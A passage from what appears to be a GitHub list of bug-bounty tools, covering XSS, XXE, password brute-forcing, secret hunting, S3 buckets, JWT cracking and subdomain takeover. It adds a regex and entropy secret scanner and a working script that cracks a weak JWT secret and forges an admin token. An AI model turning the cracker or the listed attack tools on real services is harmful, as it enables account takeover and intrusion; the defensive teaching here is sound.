<li><a href="https://github.com/shadow-workers/shadow-workers">shadow-workers</a> - Shadow Workers is a free and open source C2 and proxy designed for penetration testers to help in the exploitation of XSS and malicious Service Workers (SW)</li>
<li><a href="https://github.com/profmoriarity/rexsser">rexsser</a> - This is a burp plugin that extracts keywords from response using regexes and test for reflected XSS on the target scope.</li>
<li><a href="https://github.com/EgeBalci/xss-flare">xss-flare</a> - XSS hunter on cloudflare serverless workers.</li>
<li><a href="https://github.com/jiangsir404/Xss-Sql-Fuzz">Xss-Sql-Fuzz</a> - Burp Suite plugin that appends XSS and SQL payloads to every GET/POST parameter (special parameters filtered out) with one click and fuzzes them</li>
<li><a href="https://github.com/hipotermia/vaya-ciego-nen">vaya-ciego-nen</a> - Detect, manage and exploit Blind Cross-site scripting (XSS) vulnerabilities.</li>
<li><a href="https://github.com/AsaiKen/dom-based-xss-finder">dom-based-xss-finder</a> - Chrome extension that finds DOM based XSS vulnerabilities</li>
<li><a href="https://github.com/machinexa2/XSSTerminal">XSSTerminal</a> - Develop your own XSS Payload using interactive typing</li>
<li><a href="https://github.com/vavkamil/xss2png">xss2png</a> - PNG IDAT chunks XSS payload generator</li>
<li><a href="https://github.com/vavkamil/XSSwagger">XSSwagger</a> - A simple Swagger-ui scanner that can detect old versions vulnerable to various XSS attacks</li>
</ul>
<h3 dir="auto"><a id="user-content-xxe-injection" class="anchor" aria-hidden="true" href="xxe-injection"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>XXE Injection</h3>
<ul dir="auto">
<li><a href="https://github.com/jobertabma/ground-control">ground-control</a> - A collection of scripts that run on my web server. Mainly for debugging SSRF, blind XSS, and XXE vulnerabilities.</li>
<li><a href="https://github.com/GoSecure/dtd-finder">dtd-finder</a> - List DTDs and generate XXE payloads using those local DTDs.</li>
<li><a href="https://github.com/whitel1st/docem">docem</a> - Utility to embed XXE and XSS payloads in docx, odt, pptx, etc. (OXML_XEE on steroids)</li>
<li><a href="https://github.com/staaldraad/xxeserv">xxeserv</a> - A mini webserver with FTP support for XXE payloads</li>
<li><a href="https://github.com/luisfontes19/xxexploiter">xxexploiter</a> - Tool to help exploit XXE vulnerabilities</li>
<li><a href="https://github.com/SpiderMate/B-XSSRF">B-XSSRF</a> - Toolkit to detect and keep track on Blind XSS, XXE & SSRF</li>
<li><a href="https://github.com/enjoiz/XXEinjector">XXEinjector</a> - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods.</li>
<li><a href="https://github.com/BuffaloWill/oxml_xxe">oxml_xxe</a> - A tool for embedding XXE/XML exploits into different filetypes</li>
<li><a href="https://github.com/vp777/metahttp">metahttp</a> - A bash script that automates the scanning of a target network for HTTP resources through XXE</li>
</ul>
<hr>
<h2 dir="auto"><a id="user-content-miscellaneous" class="anchor" aria-hidden="true" href="miscellaneous"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Miscellaneous</h2>
<h3 dir="auto"><a id="user-content-passwords" class="anchor" aria-hidden="true" href="passwords"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Passwords</h3>
<ul dir="auto">
<li><a href="https://github.com/vanhauser-thc/thc-hydra">thc-hydra</a> - Hydra is a parallelized login cracker which supports numerous protocols to attack.</li>
<li><a href="https://github.com/ihebski/DefaultCreds-cheat-sheet">DefaultCreds-cheat-sheet</a> - One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password</li>
<li><a href="https://github.com/ztgrace/changeme">changeme</a> - A default credential scanner.</li>
<li><a href="https://github.com/1N3/BruteX">BruteX</a> - Automatically brute force all services running on a target.</li>
<li><a href="https://github.com/lanjelot/patator">patator</a> - Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.</li>
</ul>
<h3 dir="auto"><a id="user-content-secrets" class="anchor" aria-hidden="true" href="secrets"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Secrets</h3>
<ul dir="auto">
<li><a href="https://github.com/awslabs/git-secrets">git-secrets</a> - Prevents you from committing secrets and credentials into git repositories</li>
<li><a href="https://github.com/zricethezav/gitleaks">gitleaks</a> - Scan git repos (or files) for secrets using regex and entropy</li>
<li><a href="https://github.com/dxa4481/truffleHog">truffleHog</a> - Searches through git repositories for high entropy strings and secrets, digging deep into commit history</li>
<li><a href="https://github.com/hisxo/gitGraber">gitGraber</a> - gitGraber: monitor GitHub to search and find sensitive data in real time for different online services</li>
<li><a href="https://github.com/thoughtworks/talisman">talisman</a> - By hooking into the pre-push hook provided by Git, Talisman validates the outgoing changeset for things that look suspicious - such as authorization tokens and private keys.</li>
<li><a href="https://github.com/BishopFox/GitGot">GitGot</a> - Semi-automated, feedback-driven tool to rapidly search through troves of public data on GitHub for sensitive secrets.</li>
<li><a href="https://github.com/anshumanbh/git-all-secrets">git-all-secrets</a> - A tool to capture all the git secrets by leveraging multiple open source git searching tools</li>
<li><a href="https://github.com/gwen001/github-search">github-search</a> - Tools to perform basic search on GitHub.</li>
<li><a href="https://github.com/cve-search/git-vuln-finder">git-vuln-finder</a> - Finding potential software vulnerabilities from git commit messages</li>
<li><a href="https://github.com/x1sec/commit-stream">commit-stream</a> - OSINT tool for finding Github repositories by extracting commit logs in real time from the Github event API</li>
<li><a href="https://github.com/michenriksen/gitrob">gitrob</a> - Reconnaissance tool for GitHub organizations</li>
<li><a href="https://github.com/auth0/repo-supervisor">repo-supervisor</a> - Scan your code for security misconfiguration, search for passwords and secrets.</li>
<li><a href="https://github.com/UnkL4b/GitMiner">GitMiner</a> - Tool for advanced mining for content on Github</li>
<li><a href="https://github.com/eth0izzle/shhgit">shhgit</a> - Ah shhgit! Find GitHub secrets in real time</li>
<li><a href="https://github.com/Yelp/detect-secrets">detect-secrets</a> - An enterprise friendly way of detecting and preventing secrets in code.</li>
<li><a href="https://github.com/newrelic/rusty-hog">rusty-hog</a> - A suite of secret scanners built in Rust for performance. Based on TruffleHog</li>
<li><a href="https://github.com/Skyscanner/whispers">whispers</a> - Identify hardcoded secrets and dangerous behaviours</li>
<li><a href="https://github.com/nielsing/yar">yar</a> - Yar is a tool for plunderin' organizations, users and/or repositories.</li>
<li><a href="https://github.com/BishopFox/dufflebag">dufflebag</a> - Search exposed EBS volumes for secrets</li>
<li><a href="https://github.com/duo-labs/secret-bridge">secret-bridge</a> - Monitors Github for leaked secrets</li>
<li><a href="https://github.com/americanexpress/earlybird">earlybird</a> - EarlyBird is a sensitive data detection tool capable of scanning source code repositories for clear text password violations, PII, outdated cryptography methods, key files and more.</li>
<li><a href="https://github.com/trufflesecurity/Trufflehog-Chrome-Extension">Trufflehog-Chrome-Extension</a> - Trufflehog-Chrome-Extension</li>
</ul>
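<p dir="auto">The scanners above combine two detectors: exact patterns for credential formats that have a recognisable shape, and a Shannon-entropy test for long random-looking strings that no pattern would catch. The following is an added example, not code from gitleaks, truffleHog or any other tool here, of a minimal scanner with both detectors plus a keyword rule, run over a constructed <code>.env</code>-style file. The AWS values in the sample are the placeholder credentials from Amazon's own documentation; the entropy threshold of 4.5 bits per character is the figure truffleHog uses for base64-like strings.</p>

```python
import math
import re

# Rules of the kind secret scanners ship: an exact pattern for a well-known key format,
# and a keyword rule for assignments to password/secret/token-like names.
RULES = {
    "aws-access-key-id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "keyword-assignment": re.compile(
        r"(?i)(?:password|passwd|pwd|secret|token|api[_-]?key)\w*\s*[:=]\s*['\"]?([^\s'\"]+)"),
}
CANDIDATE = re.compile(r"[A-Za-z0-9+/_\-]{20,}")   # long enough for entropy to mean something
ENTROPY_THRESHOLD = 4.5                            # bits/char; truffleHog's base64 threshold


def shannon_entropy(s: str) -> float:
    """Bits per character of `s` (0 for a constant string, about 6 for uniformly random base64)."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def scan_text(text: str) -> list:
    """Return (line_number, rule, secret) triples for every finding in `text`."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in RULES.items():
            for m in pattern.finditer(line):
                findings.append((lineno, rule, m.group(m.lastindex or 0)))
        for token in CANDIDATE.findall(line):
            if shannon_entropy(token) >= ENTROPY_THRESHOLD:
                findings.append((lineno, "high-entropy", token))
    return findings


# Constructed sample file. The AWS values are the placeholders from Amazon's documentation.
SAMPLE = """\
DB_HOST=localhost
DB_PASSWORD=changeme123
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
# TODO: rotate the key above before release
"""

if __name__ == "__main__":
    for lineno, rule, secret in scan_text(SAMPLE):
        print(f"line {lineno}: {rule}: {secret}")
```

<p dir="auto">The sample shows why both detectors are needed: the access key ID has low entropy (3.7 bits/char, it is mostly upper-case letters) and is only caught by its <code>AKIA</code> pattern, while the secret key matches no format but clears the entropy bar at about 4.66 bits/char. In a real pipeline the keyword rule is the noisiest of the three and is usually paired with an allowlist of known placeholders.</p>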
<h3 dir="auto"><a id="user-content-git" class="anchor" aria-hidden="true" href="git"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Git</h3>
<ul dir="auto">
<li><a href="https://github.com/internetwache/GitTools">GitTools</a> - A repository with 3 tools for pwn'ing websites with .git repositories available</li>
<li><a href="https://github.com/liamg/gitjacker">gitjacker</a> - Leak git repositories from misconfigured websites</li>
<li><a href="https://github.com/arthaud/git-dumper">git-dumper</a> - A tool to dump a git repository from a website</li>
<li><a href="https://github.com/digininja/GitHunter">GitHunter</a> - A tool for searching a Git repository for interesting content</li>
<li><a href="https://github.com/kost/dvcs-ripper">dvcs-ripper</a> - Rip web accessible (distributed) version control systems: SVN/GIT/HG...</li>
</ul>
<h3 dir="auto"><a id="user-content-buckets" class="anchor" aria-hidden="true" href="buckets"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Buckets</h3>
<ul dir="auto">
<li><a href="https://github.com/sa7mon/S3Scanner">S3Scanner</a> - Scan for open AWS S3 buckets and dump the contents</li>
<li><a href="https://github.com/jordanpotti/AWSBucketDump">AWSBucketDump</a> - Security Tool to Look For Interesting Files in S3 Buckets</li>
<li><a href="https://github.com/jordanpotti/CloudScraper">CloudScraper</a> - CloudScraper: Tool to enumerate targets in search of cloud resources. S3 Buckets, Azure Blobs, Digital Ocean Storage Space.</li>
<li><a href="https://github.com/SharonBrizinov/s3viewer">s3viewer</a> - Publicly Open Amazon AWS S3 Bucket Viewer</li>
<li><a href="https://github.com/cr0hn/festin">festin</a> - FestIn - S3 Bucket Weakness Discovery</li>
<li><a href="https://github.com/hahwul/s3reverse">s3reverse</a> - Converts the various S3 bucket URL formats into one format, for bug bounty and security testing.</li>
<li><a href="https://github.com/random-robbie/mass-s3-bucket-tester">mass-s3-bucket-tester</a> - This tests a list of s3 buckets to see if they have dir listings enabled or if they are uploadable</li>
<li><a href="https://github.com/AlecBlance/S3BucketList">S3BucketList</a> - Firefox plugin that lists Amazon S3 Buckets found in requests</li>
<li><a href="https://github.com/cybercdh/dirlstr">dirlstr</a> - Finds Directory Listings or open S3 buckets from a list of URLs</li>
<li><a href="https://github.com/codewatchorg/Burp-AnonymousCloud">Burp-AnonymousCloud</a> - Burp extension that performs a passive scan to identify cloud buckets and then test them for publicly accessible vulnerabilities</li>
<li><a href="https://github.com/abuvanth/kicks3">kicks3</a> - S3 bucket finder from html,js and bucket misconfiguration testing tool</li>
<li><a href="https://github.com/Revenant40/2tearsinabucket">2tearsinabucket</a> - Enumerate s3 buckets for a specific target.</li>
<li><a href="https://github.com/nccgroup/s3_objects_check">s3_objects_check</a> - Whitebox evaluation of effective S3 object permissions, to identify publicly accessible files.</li>
<li><a href="https://github.com/ankane/s3tk">s3tk</a> - A security toolkit for Amazon S3</li>
<li><a href="https://github.com/0xsha/CloudBrute">CloudBrute</a> - Awesome cloud enumerator</li>
<li><a href="https://github.com/0xspade/s3cario">s3cario</a> - Looks up the domain's CNAME first to see whether it points at a valid Amazon S3 bucket; if not, checks whether the domain name itself is a bucket name.</li>
<li><a href="https://github.com/JR0ch17/S3Cruze">S3Cruze</a> - All-in-one AWS S3 bucket tool for pentesters.</li>
</ul>
<h3 dir="auto"><a id="user-content-cms" class="anchor" aria-hidden="true" href="cms"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>CMS</h3>
<ul dir="auto">
<li><a href="https://github.com/wpscanteam/wpscan">wpscan</a> - WPScan is a free, for non-commercial use, black box WordPress security scanner</li>
<li><a href="https://github.com/cyc10n3/WPSpider">WPSpider</a> - A centralized dashboard for running and scheduling WordPress scans powered by wpscan utility.</li>
<li><a href="https://github.com/blackcrw/wprecon">wprecon</a> - Wordpress Recon</li>
<li><a href="https://github.com/Dionach/CMSmap">CMSmap</a> - CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs.</li>
<li><a href="https://github.com/OWASP/joomscan">joomscan</a> - OWASP Joomla Vulnerability Scanner Project</li>
<li><a href="https://github.com/fgeek/pyfiscan">pyfiscan</a> - Free web-application vulnerability and version scanner</li>
</ul>
<h3 dir="auto"><a id="user-content-json-web-token" class="anchor" aria-hidden="true" href="json-web-token"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>JSON Web Token</h3>
<ul dir="auto">
<li><a href="https://github.com/ticarpi/jwt_tool">jwt_tool</a> - A toolkit for testing, tweaking and cracking JSON Web Tokens</li>
<li><a href="https://github.com/brendan-rius/c-jwt-cracker">c-jwt-cracker</a> - JWT brute force cracker written in C</li>
<li><a href="https://github.com/wallarm/jwt-heartbreaker">jwt-heartbreaker</a> - Burp extension that checks JWTs (JSON Web Tokens) for signing keys known from public sources</li>
<li><a href="https://github.com/KINGSABRI/jwtear">jwtear</a> - Modular command-line tool to parse, create and manipulate JWT tokens for hackers</li>
<li><a href="https://github.com/dariusztytko/jwt-key-id-injector">jwt-key-id-injector</a> - Simple Python script to check for a hypothetical JWT key ID (kid) injection vulnerability.</li>
<li><a href="https://github.com/hahwul/jwt-hack">jwt-hack</a> - jwt-hack is a tool for hacking / security testing of JWTs.</li>
<li><a href="https://github.com/lmammino/jwt-cracker">jwt-cracker</a> - Simple HS256 JWT token brute force cracker</li>
</ul>
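<p dir="auto">Two of the tools above are HS256 brute-forcers, and jwt_tool and jwt-hack also exercise the <code>alg: none</code> check. Both attacks are cheap to demonstrate because a JWT's signature input is public and HMAC is fast to recompute. The following is an added example, not code from any of those tools: it issues a token under a weak secret, recovers the secret with an offline dictionary attack, forges an elevated token with it, and shows a verifier that pins the algorithm so an unsigned <code>alg: none</code> token is rejected before any cryptography runs. The claims, the secret and the wordlist are constructed for this example.</p>

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hs256(signing_input: bytes, secret: str) -> bytes:
    return hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()


def make_token(payload: dict, secret: str, alg: str = "HS256") -> str:
    """Issue a token. alg='none' produces the unsigned form used to probe sloppy verifiers."""
    header = b64url_encode(json.dumps({"alg": alg, "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header}.{body}".encode()
    sig = "" if alg == "none" else b64url_encode(hs256(signing_input, secret))
    return f"{header}.{body}.{sig}"


def crack_hs256(token: str, wordlist):
    """Offline dictionary attack: re-sign the token with each candidate until the tag matches.
    Nothing touches the server, so rate limiting never sees it."""
    header, body, sig = token.split(".")
    signing_input = f"{header}.{body}".encode()
    target = b64url_decode(sig)
    for candidate in wordlist:
        if hmac.compare_digest(hs256(signing_input, candidate), target):
            return candidate
    return None


def verify(token: str, secret: str) -> dict:
    """Verifier that pins the algorithm: 'none' and anything but HS256 is rejected up front,
    so the header can never choose how it is checked."""
    header_b64, body_b64, sig = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError(f"unexpected alg {header.get('alg')!r}")
    expected = hs256(f"{header_b64}.{body_b64}".encode(), secret)
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(body_b64))


def rejects(token: str, secret: str) -> bool:
    """True when `verify` refuses the token."""
    try:
        verify(token, secret)
    except ValueError:
        return True
    return False


WORDLIST = ["password", "123456", "jwtsecret", "secret123", "changeme"]   # constructed


def demo() -> tuple:
    """Crack a weak secret from a captured token, then forge an admin token with it."""
    captured = make_token({"sub": "1001", "role": "user"}, "secret123")
    secret = crack_hs256(captured, WORDLIST)
    forged = make_token({"sub": "1001", "role": "admin"}, secret)
    return secret, verify(forged, "secret123")["role"]


if __name__ == "__main__":
    print("recovered secret and forged role:", demo())
    unsigned = make_token({"sub": "1001", "role": "admin"}, "", alg="none")
    print("alg=none rejected:", rejects(unsigned, "secret123"))
```

<p dir="auto">The dictionary loop is exactly what the C and JavaScript crackers above do at higher speed; the defence is a secret long enough that no wordlist or mask reaches it (or an asymmetric algorithm), plus a verifier that, as here, never reads the algorithm from the token.</p>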
<h3 dir="auto"><a id="user-content-subdomain-takeover" class="anchor" aria-hidden="true" href="subdomain-takeover"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Subdomain Takeover</h3>
<ul dir="auto">
<li><a href="https://github.com/haccer/subjack">subjack</a> - Subdomain Takeover tool written in Go</li>
<li><a href="https://github.com/Ice3man543/SubOver">SubOver</a> - A Powerful Subdomain Takeover Tool</li>
<li><a href="https://github.com/JordyZomer/autoSubTakeover">autoSubTakeover</a> - A tool used to check if a CNAME resolves to the scope address. If the CNAME resolves to a non-scope address it might be worth checking out if subdomain takeover is possible.</li>
<li><a href="https://github.com/shivsahni/NSBrute">NSBrute</a> - Python utility to takeover domains vulnerable to AWS NS Takeover</li>
<li><a href="https://github.com/EdOverflow/can-i-take-over-xyz">can-i-take-over-xyz</a> - "Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling DNS records.</li>
<li><a href="https://github.com/cybercdh/cnames">cnames</a> - Take a list of resolved subdomains and output any corresponding CNAMEs en masse</li>
<li><a href="https://github.com/vavkamil/old-repos-backup/tree/master/subHijack-master">subHijack</a> - Hijacking forgotten &amp; misconfigured subdomains</li>
<li><a href="https://github.com/anshumanbh/tko-subs">tko-subs</a> - A tool that can help detect and takeover subdomains with dead DNS records</li>
<li><a href="https://github.com/nahamsec/HostileSubBruteforcer">HostileSubBruteforcer</a> - Brute-forces existing subdomains and reports whether the third-party host has been properly set up</li>
<li><a href="https://github.com/mhmdiaa/second-order">second-order</a> - Second-order subdomain takeover scanner</li>
<li><a href="https://github.com/mzfr/takeover">takeover</a> - A tool for testing subdomain takeover possibilities at a mass scale.</li>
</ul>
<h3 dir="auto"><a id="user-content-vulnerability-scanners" class="anchor" aria-hidden="true" href="vulnerability-scanners"></a>Vulnerability Scanners</h3>
<ul dir="auto">
<li><a href="https://github.com/projectdiscovery/nuclei">nuclei</a> - Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use.</li>
<li><a href="https://github.com/1N3/Sn1per">Sn1per</a> - Automated pentest framework for offensive security experts</li>
<li><a href="https://github.com/rapid7/metasploit-framework">metasploit-framework</a> - Metasploit Framework</li>
<li><a href="https://github.com/sullo/nikto">nikto</a> - Nikto web server scanner</li>
<li><a href="https://github.com/Arachni/arachni">arachni</a> - Web Application Security Scanner Framework</li>
<li><a href="https://github.com/jaeles-project/jaeles">jaeles</a> - The Swiss Army knife for automated Web Application Testing</li>
<li><a href="https://github.com/RetireJS/retire.js">retire.js</a> - scanner detecting the use of JavaScript libraries with known vulnerabilities</li>
<li><a href="https://github.com/j3ssie/Osmedeus">Osmedeus</a> - Fully automated offensive security framework for reconnaissance and vulnerability scanning</li>
<li><a href="https://github.com/vulnersCom/getsploit">getsploit</a> - Command line utility for searching and downloading exploits</li>
<li><a href="https://github.com/cloudflare/flan">flan</a> - A pretty sweet vulnerability scanner</li>
<li><a href="https://github.com/1N3/Findsploit">Findsploit</a> - Find exploits in local and online databases instantly</li>
<li><a href="https://github.com/1N3/BlackWidow">BlackWidow</a> - A Python based web application scanner to gather OSINT and fuzz for OWASP vulnerabilities on a target website.</li>
<li><a href="https://github.com/PortSwigger/backslash-powered-scanner">backslash-powered-scanner</a> - Finds unknown classes of injection vulnerabilities</li>
<li><a href="https://github.com/BitTheByte/Eagle">Eagle</a> - Multithreaded Plugin based vulnerability scanner for mass detection of web-based applications vulnerabilities</li>
<li><a href="https://github.com/edoardottt/cariddi">cariddi</a> - Take a list of domains, crawl URLs and scan for endpoints, secrets, API keys, file extensions, tokens and more</li>
</ul>
<h3 dir="auto">Bonus</h3>
<ul dir="auto">
<li><a href="https://github.com/topics/bugbounty-tool">bugbounty-tool</a> - GitHub topic listing further bug bounty tools</li>
</ul>
</article>
</div>
</div>
</readme-toc>
</div>
</body>
</html>